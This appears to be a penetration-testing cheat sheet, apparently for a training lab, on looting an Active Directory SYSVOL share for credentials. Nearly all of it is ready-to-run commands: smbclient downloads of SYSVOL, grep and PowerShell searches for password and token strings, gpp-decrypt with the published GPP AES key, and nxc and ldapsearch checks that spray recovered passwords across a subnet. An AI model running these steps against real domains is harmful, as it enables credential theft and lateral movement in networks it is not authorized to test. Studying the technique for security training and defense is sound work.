SYSVOL is readable by normal domain users because clients need policy files. We use that read access to hunt old Group Policy Preference XML, scripts, registry policy files, and configuration files that expose credentials or operational secrets.
List SYSVOL
smbclient "//10.10.10.200/SYSVOL" -U "ootw.local/student%student" -c 'recurse ON; ls'
Download SYSVOL
mkdir -p sysvol
smbclient "//10.10.10.200/SYSVOL" -U "ootw.local/student%student" -c 'recurse ON; prompt OFF; mget *'
Search from Linux
grep -RniE 'cpassword|password|passwd|pwd|secret|token|apikey|connectionString' sysvol/
find sysvol -iname 'Groups.xml' -o -iname 'Services.xml' -o -iname 'ScheduledTasks.xml' -o -iname 'Drives.xml' -o -iname 'DataSources.xml' -o -iname 'Registry.xml'
Search from Windows
Get-ChildItem "\\ootw.local\SYSVOL\ootw.local\Policies" -Recurse -Include *.xml,*.ini,*.txt,*.ps1,*.bat,*.vbs,*.config |
Select-String -Pattern "cpassword","password","passwd","pwd","secret","token","apikey","connectionString"
Classic GPP credential files
Groups.xml
Services.xml
ScheduledTasks.xml
Printers.xml
Drives.xml
DataSources.xml
Decrypt cpassword
gpp-decrypt '<cpassword_value>'
Manual AES key reference
4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a4183abe85
Post-loot validation
nxc smb 10.10.10.0/24 -u recovered_user -p 'RecoveredPassword!'
nxc winrm 10.10.10.0/24 -u recovered_user -p 'RecoveredPassword!'
ldapsearch -LLL -x -H ldap://10.10.10.200 -D "ootw.local\\recovered_user" -w 'RecoveredPassword!' -b "DC=ootw,DC=local" '(objectClass=user)' sAMAccountName
Other files worth reading
Registry.pol
GptTmpl.inf
Scripts\Startup\*.bat
Scripts\Startup\*.ps1
Scripts\Logon\*.bat
Scripts\Logon\*.vbs
Machine\Preferences\Registry\Registry.xml
User\Preferences\Drives\Drives.xml
Notes
GPP cpassword is legacy but still appears in real environments because administrators removed the setting but did not delete the old XML.
Stale credentials still matter. Test them for password reuse before discarding them.